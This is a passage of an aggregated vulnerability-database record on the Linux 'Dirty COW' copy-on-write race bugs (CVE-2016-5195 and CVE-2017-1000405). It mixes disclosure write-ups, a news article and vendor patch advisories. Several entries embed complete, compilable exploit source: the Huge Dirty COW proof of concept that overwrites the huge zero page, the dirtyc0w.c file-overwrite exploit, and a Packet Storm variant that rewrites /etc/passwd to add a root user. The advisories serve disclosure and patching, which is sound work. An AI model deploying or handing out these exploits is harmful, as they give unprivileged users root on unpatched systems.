strings; one for the mangled name and one for the demangled\r\n(gdb)\r\n```\r\n\r\nLink to our [POC](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Fbindecy%2FHugeDirtyCowPOC)\r\n\r\n### Summary\r\nThis bug demonstrates the importance of patch auditing in the security development life-cycle. As the Dirty COW case and other [past cases](https://medium.com/r/?url=https%3A%2F%2Fsektioneins.de%2Fblog%2F16-09-05-pegasus-ios-kernel-vulnerability-explained-part-2.html) show, even hyped vulnerabilities may get incomplete patches. The situation is not reserved for closed source software only; open source software suffers just as much.\r\n\r\nFeel free to comment with any question or idea about the issue \r\n\r\n### Disclosure timeline\r\nThe initial report was on the 22.11.17 to the kernel and distros mailing lists. The response was immediate and professional with a [patch](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Ftorvalds%2Flinux%2Fcommit%2Fa8f97366452ed491d13cf1e44241bc0b5740b1f0) ready in a few days. The patch fixes the touch_pmd function to set the dirty bit of the PMD entry only when the caller asks for write access.\r\n\r\nThanks to the Security team and the distros for their time and effort of maintaining a high standard of security.\r\n\r\n* 22.11.17\u200a\u2014\u200aInitial report to security@kernel.org and linux-distros@vs.openwall.org\r\n* 22.11.17\u200a\u2014\u200aCVE-2017\u20131000405 was assigned\r\n* 27.11.17\u200a\u2014\u200aPatch was committed to mainline kernel\r\n* 29.11.17\u200a\u2014\u200aPublic announcement", "modified": "2017-11-30T00:00:00", "published": "2017-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96908", "id": "SSV:96908", "type": "seebug", "title": "\"Huge Dirty COW\" (CVE-2017\u20131000405)", "sourceData": "\n //\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96908", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:03:04", "bulletinFamily": "exploit", "description": "### Summary\r\n\r\n\r\nA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.\r\n\r\nThe bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.\r\n\r\nThere are proof of concept available [here](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs).\r\n\r\n### Video Explanation\r\n\r\n\r\n\r\n[link](https://www.youtube.com/watch?v=kEsshExn7aE)\r\n\r\n### Impact\r\n\r\n\r\n* An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\r\n* This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.\r\n\r\n### Analysis\r\n \r\n\r\n```\r\n\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n do_fault <- pte is not present\r\n do_cow_fault <- FAULT_FLAG_WRITE\r\n alloc_set_pte\r\n maybe_mkwrite(pte_mkdirty(entry), vma) <- mark the page dirty\r\n but keep it RO \r\n# Returns with 0 and retry\r\nfollow_page_mask\r\n follow_page_pte\r\n (flags & FOLL_WRITE) && !pte_write(pte) <- retry fault\r\n\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n FAULT_FLAG_WRITE && !pte_write\r\n do_wp_page\r\n PageAnon() <- this is CoWed page already\r\n reuse_swap_page <- page is exclusively ours\r\n wp_page_reuse\r\n maybe_mkwrite <- dirty but RO again\r\n ret = VM_FAULT_WRITE\r\n((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) <- we drop FOLL_WRITE\r\n\r\n#Returns with 0 and retry as a read fault\r\ncond_resched -> different thread will now unmap via madvise\r\nfollow_page_mask\r\n !pte_present && pte_none\r\nfaultin_page\r\n handle_mm_fault\r\n __handle_mm_fault\r\n handle_pte_fault\r\n do_fault <- pte is not present\r\n do_read_fault <- this is a read fault and we will get pagecache\r\n page!\r\n```\r\n\r\n### How\r\n\r\n\r\n* The In The Wild exploit relied on writing to /proc/self/mem on one side of the race.\r\n* ptrace(PTRACE_POKEDATA) can write to readonly mappings.\r\n* The attack relies on racing the madvise(MADV_DONTNEED) system call while having the page of the executable mmapped in memory.\r\n\r\n### Commit messages\r\n\r\n\r\n commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6\r\n Author: Linus Torvalds <torvalds@g5.osdl.org>\r\n Date: Mon Aug 1 11:14:49 2005 -0700\r\n\r\n Fix get_user_pages() race for write access\r\n\r\n There's no real guarantee that handle_mm_fault() will always be able to\r\n break a COW situation - if an update from another thread ends up\r\n modifying the page table some way, handle_mm_fault() may end up\r\n requiring us to re-try the operation.\r\n\r\n That's normally fine, but get_user_pages() ended up re-trying it as a\r\n read, and thus a write access could in theory end up losing the dirty\r\n bit or be done on a page that had not been properly COW'ed.\r\n\r\n This makes get_user_pages() always retry write accesses as write\r\n accesses by making \"follow_page()\" require that a writable follow has\r\n the dirty bit set. That simplifies the code and solves the race: if the\r\n COW break fails for some reason, we'll just loop around and try again.\r\n\r\n\r\n\r\n commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619\r\n Author: Linus Torvalds <torvalds@linux-foundation.org>\r\n Date: Thu Oct 13 20:07:36 2016 GMT\r\n\r\n This is an ancient bug that was actually attempted to be fixed once\r\n (badly) by me eleven years ago in commit 4ceb5db9757a (\"Fix\r\n get_user_pages() race for write access\") but that was then undone due to\r\n problems on s390 by commit f33ea7f404e5 (\"fix get_user_pages bug\").\r\n\r\n In the meantime, the s390 situation has long been fixed, and we can now\r\n fix it by checking the pte_dirty() bit properly (and do it better). The\r\n s390 dirty bit was implemented in abf09bed3cce (\"s390/mm: implement\r\n software dirty bits\") which made it into v3.9. Earlier kernels will\r\n have to look at the page state itself.\r\n\r\n Also, the VM has become more scalable, and what used a purely\r\n theoretical race back then has become easier to trigger.\r\n\r\n To fix it, we introduce a new internal FOLL_COW flag to mark the \"yes,\r\n we already did a COW\" rather than play racy games with FOLL_WRITE that\r\n is very fundamental, and then use the pte dirty flag to validate that\r\n the FOLL_COW flag is still valid.\r\n\r\n### References\r\n\r\nhttps://dirtycow.ninja \r\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/PoCs \r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384344 \r\nhttps://access.redhat.com/security/vulnerabilities/2706661\r\nhttps://plus.google.com/+KeesCook/posts/UUaXm3PcQ4n\r\nhttps://twitter.com/nelhage/status/789196293629370368\r\nhttps://bugzilla.suse.com/show_bug.cgi?id=1004418#c14", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92488", "id": "SSV:92488", "type": "seebug", "title": "Linux kernel 2.6.22 < 3.9 elevation of privilege vulnerability\n(Dirty COW)", "sourceData": "\n \r\n/*\r\n####################### dirtyc0w.c #######################\r\n\r\n# \u66f4\u591a\u8be6\u60c5\u89c1\uff1ahttps://github.com/dirtycow/dirtycow.github.io/wiki/PoCs\r\n\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ gcc -pthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n\r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,(uintptr_t) map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3) {\r\n (void)fprintf(stderr, \"%s\\n\",\r\n \"usage: dirtyc0w target_file new_content\");\r\n return 1; }\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %zx\\n\\n\",(uintptr_t) map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92488"}], "huawei": [{"lastseen": "2019-02-01T18:01:50", "bulletinFamily": "software", "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "modified": "2017-05-31T00:00:00", "published": "2016-12-07T00:00:00", "id": "HUAWEI-SA-20161207-01-DIRTYCOW", "href": "https://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20161207-01-dirtycow-en", "title": "Security Advisory - Dirty COW Vulnerability in Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:34", "bulletinFamily": "info", "description": "A nine-year-old Linux vulnerability that affects most of the major distributions has been recently used in public attacks. The flaw, nicknamed Dirty Cow because it lives in the copy-on-write (COW) feature in Linux, is worrisome because it can give a local attacker root privileges.\n\nWhile the Linux kernel was patched on Wednesday, the major distributions are preparing [patches](<https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>). [Red Hat](<https://bugzilla.redhat.com/show_bug.cgi?id=1384344>), for example, told Threatpost that it has a temporary mitigation available through the kpatch dynamic kernel patching service that customers can receive through their support contact.\n\nDirty Cow is a privilege escalation vulnerability in copy-on-write, [CVE-2016-5195](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>). A race condition exists that allows local users to gain write-access to read-only memory and elevate their privileges to root.\n\nExploits were discovered recently by researcher Phil Oester, who published an informational website on the bug that includes links to [details on the flaw and a proof-of-concept exploit](<http://dirtycow.ninja/>). Oester said the bug has been in the kernel since version 2.6.22, released in 2007.\n\n\u201cThis flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set,\u201d Oester said on his [website](<https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails>).\n\nRed Hat Security Strategist Josh Bressers said the vulnerability is serious but since it is not remotely exploitable, it\u2019s less critical than Heartbleed and other Internet-wide bugs admins have dealt with in the last two-plus years.\n\n\u201cIt\u2019s not on-fire bad like some of the other bugs that have names,\u201d Bressers said. \u201cAn attacker has to have broken in already and then exercise the flaw to gain root. It\u2019s serious, but much less serious because you essentially need two exploits versus just one.\u201d\n\n[Copy-on-write](<http://stackoverflow.com/questions/628938/what-is-copy-on-write>) is a feature used in programming across platforms that manages resources in memory. Multiple processes may share that same page until a user needs to write to it, which is known as marking the page dirty, Bressers said.\n\n\u201cThe problem comes down to the fact that there was a logic error in the Linux kernel that said you could exercise a race condition so that before the kernel separates pages that are marked dirty, it would let you write to the original page,\u201d Bressers said. \u201cAt the same time, another part of the process is writing to it. It allows you to change a file on the disk you shouldn\u2019t be able to change.\u201d\n\nBressers said that attackers would also be limited in virtual machines and containers. For example, they would not be able to escape a virtual machine and attack the host server.\n\n\u201cCurrent exploits don\u2019t work in containers given the way they work,\u201d Bressers said. \u201cIf it could be exploited in the container, the containment technology will keep you in the container. You need something else to get out. So it\u2019s clear, newer technology is useful as a mitigation in this case.\u201d\n", "modified": "2016-10-21T17:40:51", "published": "2016-10-21T11:21:36", "id": "THREATPOST:E5B29B24D99DF66802D64661812BCFB9", "href": "https://threatpost.com/serious-dirty-cow-linux-vulnerability-under-attack/121448/", "type": "threatpost", "title": "Serious Dirty Cow Linux Vulnerability Under Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:16", "bulletinFamily": "exploit", "description": "", "modified": "2016-11-28T00:00:00", "published": "2016-11-28T00:00:00", "href": "https://packetstormsecurity.com/files/139923/Linux-Kernel-Dirty-COW-PTRACE_POKEDATA-Privilege-Escalation.html", "id": "PACKETSTORM:139923", "type": "packetstorm", "title": "Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation", "sourceData": "`// \n// This exploit uses the pokemon exploit as a base and automatically \n// generates a new passwd line. The original /etc/passwd is then \n// backed up to /tmp/passwd.bak and overwritten with the new line. \n// The user will be prompted for the new password when the binary is run. \n// After running the exploit you should be able to login with the newly \n// created user. \n// \n// Original exploit: \n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c \n// \n// To use this exploit modify the user values according to your needs \n// \n// Compile with \n// \n// gcc -pthread dirty.c -o dirty -lcrypt \n// \n// and just run the newly create binary with ./dirty \n// \n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT ! \n// \n// Exploit adopted by Christian \"FireFart\" Mehlmauer \n// https://firefart.at \n// \n \n \n#include <fcntl.h> \n#include <pthread.h> \n#include <string.h> \n#include <stdio.h> \n#include <stdint.h> \n#include <sys/mman.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <sys/wait.h> \n#include <sys/ptrace.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <crypt.h> \n \nconst char *filename = \"/etc/passwd\"; \nconst char *backup_filename = \"/tmp/passwd.bak\"; \nconst char *salt = \"firefart\"; \n \nint f; \nvoid *map; \npid_t pid; \npthread_t pth; \nstruct stat st; \n \nstruct Userinfo { \nchar *username; \nchar *hash; \nint user_id; \nint group_id; \nchar *info; \nchar *home_dir; \nchar *shell; \n}; \n \nchar *generate_password_hash(char *plaintext_pw) { \nreturn crypt(plaintext_pw, salt); \n} \n \nchar *generate_passwd_line(struct Userinfo u) { \nconst char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\"; \nint size = snprintf(NULL, 0, format, u.username, u.hash, \nu.user_id, u.group_id, u.info, u.home_dir, u.shell); \nchar *ret = malloc(size + 1); \nsprintf(ret, format, u.username, u.hash, u.user_id, \nu.group_id, u.info, u.home_dir, u.shell); \nreturn ret; \n} \n \nvoid *madviseThread(void *arg) { \nint i, c = 0; \nfor(i = 0; i < 200000000; i++) { \nc += madvise(map, 100, MADV_DONTNEED); \n} \nprintf(\"madvise %d\\n\\n\", c); \n} \n \nint copy_file(const char *from, const char *to) { \n// check if target file already exists \nif(access(to, F_OK) != -1) { \nprintf(\"File %s already exists! Please delete it and run again\\n\", \nto); \nreturn -1; \n} \n \nchar ch; \nFILE *source, *target; \n \nsource = fopen(from, \"r\"); \nif(source == NULL) { \nreturn -1; \n} \ntarget = fopen(to, \"w\"); \nif(target == NULL) { \nfclose(source); \nreturn -1; \n} \n \nwhile((ch = fgetc(source)) != EOF) { \nfputc(ch, target); \n} \n \nprintf(\"%s successfully backed up to %s\\n\", \nfrom, to); \n \nfclose(source); \nfclose(target); \n \nreturn 0; \n} \n \nint main(int argc, char *argv[]) \n{ \n// backup file \nint ret = copy_file(filename, backup_filename); \nif (ret != 0) { \nexit(ret); \n} \n \nstruct Userinfo user; \n// set values, change as needed \nuser.username = \"firefart\"; \nuser.user_id = 0; \nuser.group_id = 0; \nuser.info = \"pwned\"; \nuser.home_dir = \"/root\"; \nuser.shell = \"/bin/bash\"; \n \nchar *plaintext_pw = getpass(\"Please enter new password: \"); \nuser.hash = generate_password_hash(plaintext_pw); \nchar *complete_passwd_line = generate_passwd_line(user); \nprintf(\"Complete line:\\n%s\\n\", complete_passwd_line); \n \nf = open(filename, O_RDONLY); \nfstat(f, &st); \nmap = mmap(NULL, \nst.st_size + sizeof(long), \nPROT_READ, \nMAP_PRIVATE, \nf, \n0); \nprintf(\"mmap: %lx\\n\",(unsigned long)map); \npid = fork(); \nif(pid) { \nwaitpid(pid, NULL, 0); \nint u, i, o, c = 0; \nint l=strlen(complete_passwd_line); \nfor(i = 0; i < 10000/l; i++) { \nfor(o = 0; o < l; o++) { \nfor(u = 0; u < 10000; u++) { \nc += ptrace(PTRACE_POKETEXT, \npid, \nmap + o, \n*((long*)(complete_passwd_line + o))); \n} \n} \n} \nprintf(\"ptrace %d\\n\",c); \n} \nelse { \npthread_create(&pth, \nNULL, \nmadviseThread, \nNULL); \nptrace(PTRACE_TRACEME); \nkill(getpid(), SIGSTOP); \npthread_join(pth,NULL); \n} \n \nprintf(\"Done! Check %s to see if the new user was created\\n\", filename); \nprintf(\"You can log in with username %s and password %s.\\n\\n\", \nuser.username, plaintext_pw); \nprintf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\", \nfilename, backup_filename); \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139923/dirtydirtycow-escalate.txt"}], "paloalto": [{"lastseen": "2020-03-02T18:33:28", "bulletinFamily": "software", "description": "A vulnerability exists in the kernel of PAN-OS that may result in an elevation of privilege. This issue is publicly known as Dirty COW (ref # PAN-68074 / CVE-2016-5195).\nPAN-OS may be impacted by the Dirty COW (CVE-2016-5195) attack. A race condition was found in the way the Linux kernel's memory subsystem handles the copy-on-write breakage of private read-only memory mappings. An attacker would first require access to a shell on the device before they could use this exploit. Shell access is significantly restricted on the device. The Command Line Interface (CLI) is not shell access and therefore this issue cannot be exploited by the CLI.\nThis issue affects PAN-OS 5.1, PAN-OS 6.0, PAN-OS 6.1, PAN-OS 7.0.13, PAN-OS 7.1.7 and earlier\n\n\n**Work around:**\nPalo Alto Networks recommends to implement best practice by allowing web interface access only to a dedicated management network. Additionally, restrict the set of IP addresses to a subset of authorized sources that you allow to interact with the management network.\n", "modified": "2017-02-21T19:30:00", "published": "2017-02-21T19:30:00", "id": "PAN-SA-2017-0003", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-5195", "title": "Kernel Vulnerability ", "type": "paloalto", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2019-05-29T19:20:24", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\n\n(Updated 2016-11-10: This advisory was upgraded to Critical.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-4.4.23-31.54.amzn1.i686 \n kernel-devel-4.4.23-31.54.amzn1.i686 \n kernel-tools-debuginfo-4.4.23-31.54.amzn1.i686 \n kernel-tools-devel-4.4.23-31.54.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.23-31.54.amzn1.i686 \n perf-4.4.23-31.54.amzn1.i686 \n kernel-debuginfo-4.4.23-31.54.amzn1.i686 \n perf-debuginfo-4.4.23-31.54.amzn1.i686 \n kernel-tools-4.4.23-31.54.amzn1.i686 \n kernel-headers-4.4.23-31.54.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.23-31.54.amzn1.noarch \n \n src: \n kernel-4.4.23-31.54.amzn1.src \n \n x86_64: \n kernel-tools-devel-4.4.23-31.54.amzn1.x86_64 \n kernel-4.4.23-31.54.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.23-31.54.amzn1.x86_64 \n perf-debuginfo-4.4.23-31.54.amzn1.x86_64 \n kernel-devel-4.4.23-31.54.amzn1.x86_64 \n kernel-tools-4.4.23-31.54.amzn1.x86_64 \n perf-4.4.23-31.54.amzn1.x86_64 \n kernel-debuginfo-4.4.23-31.54.amzn1.x86_64 \n kernel-headers-4.4.23-31.54.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.23-31.54.amzn1.x86_64 \n \n \n", "modified": "2016-11-10T18:00:00", "published": "2016-11-10T18:00:00", "id": "ALAS-2016-757", "href": "https://alas.aws.amazon.com/ALAS-2016-757.html", "title": "Critical: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:27:18", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2016:2098\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-October/034171.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-2098.html", "modified": "2016-10-25T11:17:10", "published": "2016-10-25T11:17:10", "href": "http://lists.centos.org/pipermail/centos-announce/2016-October/034171.html", "id": "CESA-2016:2098", 